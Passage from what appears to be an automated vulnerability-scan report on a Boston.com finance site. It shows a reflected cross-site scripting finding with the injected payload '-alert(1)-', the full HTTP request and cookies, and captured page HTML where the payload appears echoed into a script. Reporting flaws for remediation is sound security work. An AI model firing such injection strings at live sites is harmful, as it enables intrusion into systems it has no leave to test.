Last-Modified: Wed, 16 Mar 2011 22:45:17 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 26192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Stock Market | Stock Market Summary (NSDQ, NYSE, AMEX and more) on Boston.com </title>
<meta name="robots" content="noarchive" />
<meta http-equiv="Keywords" content="stock market summary, stock information, nsdq, nyse, amex" />
<meta http-equiv="Description" content="Find the latest stock activity of the day with our stock market summary on Boston.com" />
<meta http-equiv="charset" content="iso-8859-1">
<link rel="search" type="application/opensearchdescription+xml" title="Boston.com Local Search" href="http://cache.boston.com/search/files/bostonsearch.xml" />
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles.css" type="text/css" />
<!--[if IE]><link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles_ie.css" type="text/css" /><![endif]-->
<script language="JavaScript" type="text/javascript" src="http://cache.boston.com/universal/js/bcom_global_scripts.js"></script>
<script language="javascript" type="text/javascript" src="http://cache.boston.com/universal/js/jquery-1.3.2.min.js"></script>
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_section_styles.css" type="text/css" />
<script>ifSafari();</script>
<!--Weather Query Params--><script language="JavaScript1.1" type="text/javascript" src="http://cache.boston.com/weather-ad-include.js"></script>
<!--Begin OAS MJX setup tag--><script language="JavaScript"><!--
//configuration
var site=document.URL.toLowerCase().match(/s_campaign=(\w+)/);
if (!(site))
{campaign="0000"}
else
{campaign=site[1]};
var siteMarket=document.URL.split('/');
if (siteMarket[3] == 'boston?Page=MarketSummary')
OAS_sitepage='www.boston.com/business/markets/homepage'
else
OAS_sitepage='www.boston.com/business/markets';
OAS_listpos='TOP,INTRO,BOTTOM,POPUP,POPUN,EXTRA,BILLBOARD,SPONSOR1,SPONSOR2,SPONSOR3,SPONSOR4,SPONSOR5,SPONSOR6,CENTRAL';
oasquery='pagetype=generic_page&RM_Exclude=exclude_generic_page&s_campaign='+campaign;if(typeof OAS_query=='undefined'||!OAS_query)OAS_query=oasquery;else OAS_query+='&'+oasquery;
OAS_url='http://rmedia.boston.com/RealMedia/ads/';OAS_target='_top';OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';OAS_rn=new String(Math.random());OAS_rns=OAS_rn.substring(2, 11);
//--></script><script language="JavaScript1.2"><!--
var rerefer=/referrer=(\w+)/,urefer=document.URL.match(rerefer);if(urefer){if(OAS_query){var reexclude=/RM_Exclude=[\w,*]+/,OAS_query=OAS_query.replace(reexclude,OAS_query.match(reexclude)[0]+',exclude_referrer_'+urefer[1].toLowerCase());OAS_query+='&';}OAS_query+=urefer[0];}
//--></script><script language="JavaScript"><!--
function OAS_NORMAL(pos){document.writeln('<A HREF="'+OAS_url+'click_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+ pos+'?'+OAS_query+'" TARGET='+OAS_target+'>');document.writeln('<IMG SRC="'+OAS_url+'adstream_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+pos+'?'+OAS_query+'" BORDER=0></A>');}
//--></script><script language="JavaScript1.1"><!--
OAS_version=11;if((navigator.userAgent.indexOf('Mozilla/3')!=-1)||navigator.userAgent.indexOf('Mozilla/4.0 WebTV')!=-1){OAS_version=10;}if(OAS_version >= 11)document.writeln('<SCR'+'IPT LANGUAGE=JavaScript1.1 SRC="'+OAS_url+'adstream_mjx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'?'+OAS_query+'"> <\/SCRIPT>');
//--></script><script language="JavaScript"><!--
document.writeln('');
function OAS_AD(pos){if(OAS_version >= 11)OAS_RICH(pos);else OAS_NORMAL(pos);}
//--></script><!--End OAS MJX setup tag-->
<script language="JavaScript"><!--
var var5 = 'business_';
//--></script>
<style>
<!--
#globalNavRedux #nav li#gbusiness {background-color:#3F5F9C; background-image:url(http://cache.boston.com/universal/site_graphics/nav_main_on.gif);}
#globalNavRedux #nav li#gbusiness a {color:#fff;}
//--></style>
<style>
<!--
#globalNavRedux #sNav a#secnav_markets, a#secnav_markets:link, a#secnav_markets:visited, a#secnav_markets:active, a#secnav_markets:hover { font-weight: bold; text-decoration: none; color: #000; }
//--></style>
</head>
<body onload="windowLoaded();displayEmbed();">
<div id="container">

<div id="containerBorder">
<div id="header">
<div id="headL">
    <div id="mastHead">
    <a href="http://www.boston.com" class="imageLink"><img src="http://cache.boston.com/universal/site_graphics/bcom_small.gif"></a>
<div id="searchForm">
<div><span onclick="choose(this);" id="searchLocal" class="searchOn">Local Search</span> <span onclick="choose(this)" id="searchSite">Site Search</span></div>
<script>otherTab = document.getElementById('searchLocal');</script>
<form action="http://search.boston.com/local/Search.do" onsubmit="searchSubmit();">
<input type="text" name="s.sm.query" id="textField"><input type="submit" value="GO" class="form-button" />
<input type="hidden" id="tab" name="s.tab" value="" />
</form>
</div>
    </div>
    </div>
<div id="headR">
<div id="signIn">
<span id="login" class="utility"><script language="JavaScript"><!--
try{showLoginRRD(147);}catch(e){document.writeln('&nbsp;');}
//--></script><noscript>&nbsp;</noscript></span>
<span id="globeLogo"><span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&amp;od=28">Home Delivery</a></span><a href="http://www.boston.com/bostonglobe/"><img src="http://cache.boston.com/universal/site_graphics/glogo.jpg" /></a></span>
</div>
<div id="headAd">
<div align="center" cellpadding="0"
cellspacing="0" border="0"><div
class="bannerAd" align="center"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('TOP');
//--></script><!--End Ad Tag--></div></div>
</div>
</div>
</div>
<div id="globalNavRedux">
<ul class="gnavContainer" id="nav"><li id="ghome"><a
href="http://www.boston.com/">Home</a></li><li
id="gglobe"><a href="http://www.boston.com/bostonglobe">Today's Globe</a></li><li
id="gnews"><a href="http://www.boston.com/news/">News</a></li><li
id="gbusiness"><a href="http://www.boston.com/business/">Business</a></li><li
id="gsports"><a href="http://www.boston.com/sports/">Sports</a></li><li
id="glifestyle"><a href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li
id="gae"><a href="http://www.boston.com/ae/">A&amp;E</a></li><li
id="gthings"><a href="http://www.boston.com/thingstodo/">Things to do</a></li><li
id="gtravel"><a href="http://www.boston.com/travel/">Travel</a></li><li
id="gcars"><a href="http://www.boston.com/cars/">Cars</a></li><li
id="gjobs"><a href="http://www.boston.com/jobs/">Jobs</a></li><li
id="gre"><a href="http://www.boston.com/realestate/">Homes</a></li><li
id="gsearch"><a href="http://search.boston.com/">Local Search</a></li></ul>

<ul id="sNav"><li><a href="http://www.boston.com/business/technology/"
id="secnav_technology">Technology</a></li><li><a
href="http://www.boston.com/business/healthcare/"
id="secnav_healthcare">Healthcare</a></li><li><a
href="http://finance.boston.com/boston?Page=MarketSummary"
id="secnav_markets">Markets</a></li><li><a
href="http://www.boston.com/business/personalfinance/"
id="secnav_personalfinance">Personal finance</a></li><li><a
href="http://www.boston.com/business/columnists/"
id="secnav_columnists">Columnists</a></li></ul>

</div>
<div id="introad" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('INTRO');
//--></script><!--End Ad Tag--></div>
<div id="billboardAd" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('BILLBOARD');
//--></script><!--End Ad Tag--></div>



<div class="hideMe"><!--
<headline>More financial news</headline>
<source>Boston.com</source>
<teasetext>Check out the More financial news Page on Boston.com. </teasetext>
<byline></byline>
<date>August 24, 2009</date>
--></div>


<div id="content" class="section section95">
<div id="Col1">


<style type="text/css">@import url(http://finance.boston.com/client/boston/privatelabel.css);</style><style type="text/css">@import url(http://finance.boston.com/client/boston/boston/privatelabel.css);</style><div class="span invc">

<script src="http://js.financialcontent.com/FCON/FCON.js" type="text/javascript"></script>
<script type="text/javascript">
FCON.initialize('http://js.financialcontent.com/',false,'finance.boston.com','boston','');
</script>

<style type="text/css">@import url(http://finance.boston.com/privatelabel/privatelabel1.css);</style>
<script type="text/javascript">
document.FCON.setAutoReload(1800);
</script>

<div class="span nav">
<div class="investingnav1">
<div class="menu clearfix" hoverable="true">
<div class="item active" hoverable="true"><a href="http://finance.boston.com/boston/markets?">Markets</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/quote?Symbol=%24MASS">MA Stock Indexes</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/stocks?">Stocks</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/funds?">Mutual Funds &amp; ETF&#39;s</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/sectors?">Sectors</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/rates?">Rates</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/user/login?">Tools</a></div>
</div>
<div class="items clearfix">
<div class="item "><a href="http://finance.boston.com/boston/markets?">Overview</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/news?">Market News</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/video?">Market Videos</a></div>
<div class="item "><a href="http://finance.boston.com/boston/currencies?">Currencies</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/international?">International</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/treasury?">Treasury &amp; Bonds</a></div>
</div>

<div class="getquote clearfix">
<div class="clearfix">
<div class="tickerbox" id="investingnav_tickerbox"></div>
<a class="investingnav_search" href="http://finance.boston.com/boston/search?">Search InvestCenter</a>
</div>
<div class="hotlinks clearfix">
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/recentquotes?">Recent Quotes</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/recentquotes?">View Full List</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/watchlist?">My Watchlist</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/watchlist?">Create Watchlist</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next">Top Indices</a>
<div class="drop_items" style="display:none">
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=310%3A998313">Dow Jones Industrial Average</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=67%3A998356">NASDAQ Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=845%3A998434">Standard &amp; Poors 500</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A1540753">NYSE COMPOSITE INDX</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A568249">Amex Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=771%3A998819">Russell 2000</a></div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
document.FCON.loadLibrary('Hover');
document.FCON.loadLibraryImmediately('QuoteAPI');
document.FCON.loadLibraryImmediatelyCallback('TickerBox',
function () {
document.FCON.TickerBox.create(document.getElementById("investingnav_tickerbox"));
}
);
</script>
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/nav/investingnav1.css);</style>

</div>

<div class="span page">
<style type="text/css">
#error {
padding: 0 5px;
}
#error .box {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
background: #254f7c;
padding: 1em;
_height: 164px;
min-height: 164px;
color: #fff;
font-size: 1.5em;
position: relative;
}
#error .box.gray {
background: #2a2a2a;
}
#error .box .box_inner {
margin-top: 180px;
}
#error .box .icon {
height: 164px;
width: 164px;
position: absolute;
top: 20px;
left: 20px;
background: url(http://images.financialcontent.com/studio-6.0/icons/164x164/404-icon.png) no-repeat top left;
_filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://images.financialcontent.com/studio-6.0/icons/164x164/404-icon.png', sizingMethod='image');
_background: transparent;
}
#error .box h3 {
color: #fff;
margin: 0;
padding: 0;
font-size: 2.0em;
    line-height: 2.0em;
font-weight: bold;
}
#error .box h3 strong {
color: #7cc45e;
text-transform: uppercase;
}
#error .box.gray h3 strong {
color: #718ba9;
}
#error .box .error-info {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
padding: 1em;
background: #395F88;
}
#error .box.gray .error-info {
background: #3d3d3d;
}
#error .box.gray .error-detail {

}
</style>
<!-- /404 STYLING -->

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="50%" valign="top">
<div class="widget fcadunit">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=2153");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
</td>
<td width="50%" valign="top">
<div id="error">
<div class="box error">
<div class="box_header">
<div class="box_corner"></div>
</div>
<div class="icon"></div>
<div class="box_inner">
<h3><strong>Error:</strong> 404</h3>
<div class="error-info">
The page you requested cannot be found - please try one of the links above.
</div>
</div>
<div class="box_footer">
<div class="box_corner"></div>
</div>
</div>
</div>
</td>
</tr>
</table>




</div>

<div style="padding:0 10px 10px 10px">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1837");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
<div class="attribution">
<a href="http://www.financialcontent.com" style="font-weight:bold">Stock Market XML and JSON Data API</a> provided by FinancialContent Services, Inc.<br />
Nasdaq quotes delayed at least 15 minutes, all others at least 20 minutes. <br />
By accessing this page, you agree to the following
<a href="http://www.financialcontent.com/tos.html" target="_blank" >terms and conditions</a>.<br />
<a href="http://rates.banks.com/mortgage-rates/" target="_blank" >Mortgage Rates</a>, <a href="http://rates.banks.com/cd-rates/" target="_blank" >CD Rates</a> &amp;
<a href="http://rates.banks.com/home-equity-rates/" target="_blank" >Home Equity Rates</a> provided by <a href="http://www.banks.com/" target="_blank" >Banks.com</a>
<br />
<a href="http://www.prconnect.com/" target="_blank" >Press Release Service</a> provided by PRConnect.
<br />
Fundamental data supplied by Morningstar<br />
Stock quotes supplied by Telekurs USA<br />
<a style="display:none" href="http://www.financialcontent.com/honeypot/">Bots go here</a>
</div>

<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/attribution/attribution1.css);</style>

<script>
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.boston.com%2Fboston%2Fnewse2414'-alert(1)-'9b8d827bc87%2Fread%3FHTTP_HOST%3Dfinance.boston.com%26HTTPS%3Doff%26GUID%3D17744398&Type=page&Client=boston&rand=' + Math.random();
head.appendChild(script);
</script>

<script>
_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);
</script>
<script langugage="JavaScript">var tcdacmd="dt";</script> <script
src="http://an.tacoda.net/an/18181/slf.js" language="JavaScript"></script>
</div>



</div>
<div id="Col2">
<div id="railTop"></div>
<div class="fixedAds"><div><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('CENTRAL');
//--></script><!--End Ad Tag--></div></div>
</div>
<div id="Col3"></div>
<div class="cf"></div>
</div>

<div id="footer">
<div id="bottomBanner">
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR1');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR2');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR3');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR4');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR5');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR6');
//--></script><!--End Ad Tag--></div>
<div class="cf"></div>
</div>
<div>
<div id="bottomLinks">
<ul class="gnavContainer">
<li><a rel="nofollow" href="http://www.boston.com/">Home</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/globe/">Today's Globe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/">News</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/business/">Business</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/sports/">Sports</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/ae/">A&amp;E</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/thingstodo/">Things to Do</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/travel/">Travel</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/cars/" class="cfied">Cars</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/jobs/" class="cfied">Jobs</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/realestate/" class="cfied">Homes</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/search/" class="cfied">Local Search</a></li>
</ul>
<ul id="bcomLinks">
<li class="first"><a rel="nofollow" href="http://www.boston.com/help/bostoncom_info/">Contact Boston.com</a></li> <li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/">Help</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mediakit/bgm/index.html">Advertise</a></li><li class="listPipe">|</li>
<li><a href="http://boston.monster.com/search.aspx?q=%22boston.com%22&amp;cy=us&amp;cnme=boston&amp;sid=40&amp;re=100&amp;jto=1">Work here</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/privacy_policy/">Privacy Policy</a></li><li class="listPipe">|</li>
<li><script language="JavaScript"><!--
signupLink();
//--></script><noscript><a href="http://members.boston.com/reg/login.do?dispatch=loginpage&amp;p1=Foot_ContactBostonCom_Newsletters">Newsletters</a></noscript></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mobile/">Mobile</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/tools/rss/">RSS feeds</a></li><li class="listPipe">|</li>
<li><a href="http://spiderbites.boston.com/sitemap-service/Home.xml">Sitemap</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/homepage/">Make Boston.com your homepage</a></li>
</ul>
<ul id="bglobeLinks">
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a></li><li class="listPipe">|</li>
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a></li><li class="listPipe">|</li>
<li><a href="https://bostonglobe.com/advertiser/">Advertise</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://services.bostonglobe.com/globestore/category.cgi?category=0&amp;source=bcomfooter&amp;kw=bcomfooter1">The Boston Globe Store</a></li><li class="listPipe">|</li>
<li>&copy; <script> var crYear = new Date(); document.write(crYear.getFullYear());</script> NY Times Co.</li>
</ul>
</div>

</div>

</div>
</div>
</div>
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUP');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUN');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('EXTRA');
//--></script><!--End Ad Tag-->
<!-- SiteCatalyst code version: G.5. Copyright 1997-2003 Omniture, Inc. More info available at http://www.omniture.com --><script
language="JavaScript"><!--
var s_pageName='Business | Markets | Financial Content (all)',s_channel='Business',s_prop1='Business | Markets';
var s_server='',s_pageType='',s_prop2='',s_prop3='',s_prop4='',s_prop5='',s_prop6='Financial Content page',s_prop7='',s_prop8='',s_prop9='',s_prop10='';
/* E-commerce Variables */
var s_campaign='',s_state='',s_zip='',s_events='',s_products='',s_purchaseID='',s_eVar1='',s_eVar2='',s_eVar3='',s_eVar4='',s_eVar5='',s_eVar6='',s_eVar7='',s_eVar8='',s_eVar9='',s_eVar10='';
var s_code='' ;
//--></script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>

<script language="JavaScript"><!--
var s_wd=window,s_tm=new Date;if(s_code!=' '){s_code=s_dc('nytbglobe');if(s_code)document.write(s_code);}else document.write('<im'+'g src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--FB/s'+s_tm.getTime()+'?[AQB]'+'&j=1.0&[AQE]" height="1" width="1" border="0" alt="" />');
//--></script><script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-');
//--></script><noscript><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--NS/0" height="1" width="1" border="0" alt="" /></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: G.5. -->
<!--Tacoda-->
<script language="JavaScript"><!--
var tcdacmd='dt;da;sc=Business | Markets';
//--></script>
<script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
<!--End Tacoda-->

</body>
</html>




1.3. http://finance.boston.com/boston/news/read [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.boston.com
Path:   /boston/news/read

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0ed0'-alert(1)-'9c008cc89a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boston/news/readf0ed0'-alert(1)-'9c008cc89a8?GUID=17744398 HTTP/1.1
Host: finance.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801iXt4ADx8I; RMFL=011PrVAnU105z0Y; s_vi=[CS]v1|26B12F7205013BD8-600001032000CCFA[CE]; __qca=P0-1640891764-1298293742855; ssbusi=1; RMFD=011PrVUgO105wRm|O205ya3|O105yhs; __utmz=60064574.1298293750.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60064574.1031200570.1298293750.1298293750.1298293750.1; __unam=b6206f2-12e4856c7b4-3e483bb3-1; bcpage=5; anonId=e9e75675-22e2-4aa9-9380-30d86642b1dc

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 22:45:20 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Wed, 16 Mar 2011 22:45:20 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 26192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Stock Market | Stock Market Summary (NSDQ, NYSE, AMEX and more) on Boston.com </title>
<meta name="robots" content="noarchive" />
<meta http-equiv="Keywords" content="stock market summary, stock information, nsdq, nyse, amex" />
<meta http-equiv="Description" content="Find the latest stock activity of the day with our stock market summary on Boston.com" />
<meta http-equiv="charset" content="iso-8859-1">
<link rel="search" type="application/opensearchdescription+xml" title="Boston.com Local Search" href="http://cache.boston.com/search/files/bostonsearch.xml" />
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles.css" type="text/css" />
<!--[if IE]><link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles_ie.css" type="text/css" /><![endif]-->
<script language="JavaScript" type="text/javascript" src="http://cache.boston.com/universal/js/bcom_global_scripts.js"></script>
<script language="javascript" type="text/javascript" src="http://cache.boston.com/universal/js/jquery-1.3.2.min.js"></script>
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_section_styles.css" type="text/css" />
<script>ifSafari();</script>
<!--Weather Query Params--><script language="JavaScript1.1" type="text/javascript" src="http://cache.boston.com/weather-ad-include.js"></script>
<!--Begin OAS MJX setup tag--><script language="JavaScript"><!--
//configuration
var site=document.URL.toLowerCase().match(/s_campaign=(\w+)/);
if (!(site))
{campaign="0000"}
else
{campaign=site[1]};
var siteMarket=document.URL.split('/');
if (siteMarket[3] == 'boston?Page=MarketSummary')
OAS_sitepage='www.boston.com/business/markets/homepage'
else
OAS_sitepage='www.boston.com/business/markets';
OAS_listpos='TOP,INTRO,BOTTOM,POPUP,POPUN,EXTRA,BILLBOARD,SPONSOR1,SPONSOR2,SPONSOR3,SPONSOR4,SPONSOR5,SPONSOR6,CENTRAL';
oasquery='pagetype=generic_page&RM_Exclude=exclude_generic_page&s_campaign='+campaign;if(typeof OAS_query=='undefined'||!OAS_query)OAS_query=oasquery;else OAS_query+='&'+oasquery;
OAS_url='http://rmedia.boston.com/RealMedia/ads/';OAS_target='_top';OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';OAS_rn=new String(Math.random());OAS_rns=OAS_rn.substring(2, 11);
//--></script><script language="JavaScript1.2"><!--
var rerefer=/referrer=(\w+)/,urefer=document.URL.match(rerefer);if(urefer){if(OAS_query){var reexclude=/RM_Exclude=[\w,*]+/,OAS_query=OAS_query.replace(reexclude,OAS_query.match(reexclude)[0]+',exclude_referrer_'+urefer[1].toLowerCase());OAS_query+='&';}OAS_query+=urefer[0];}
//--></script><script language="JavaScript"><!--
function OAS_NORMAL(pos){document.writeln('<A HREF="'+OAS_url+'click_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+ pos+'?'+OAS_query+'" TARGET='+OAS_target+'>');document.writeln('<IMG SRC="'+OAS_url+'adstream_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+pos+'?'+OAS_query+'" BORDER=0></A>');}
//--></script><script language="JavaScript1.1"><!--
OAS_version=11;if((navigator.userAgent.indexOf('Mozilla/3')!=-1)||navigator.userAgent.indexOf('Mozilla/4.0 WebTV')!=-1){OAS_version=10;}if(OAS_version >= 11)document.writeln('<SCR'+'IPT LANGUAGE=JavaScript1.1 SRC="'+OAS_url+'adstream_mjx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'?'+OAS_query+'"> <\/SCRIPT>');
//--></script><script language="JavaScript"><!--
document.writeln('');
function OAS_AD(pos){if(OAS_version >= 11)OAS_RICH(pos);else OAS_NORMAL(pos);}
//--></script><!--End OAS MJX setup tag-->
<script language="JavaScript"><!--
var var5 = 'business_';
//--></script>
<style>
<!--
#globalNavRedux #nav li#gbusiness {background-color:#3F5F9C; background-image:url(http://cache.boston.com/universal/site_graphics/nav_main_on.gif);}
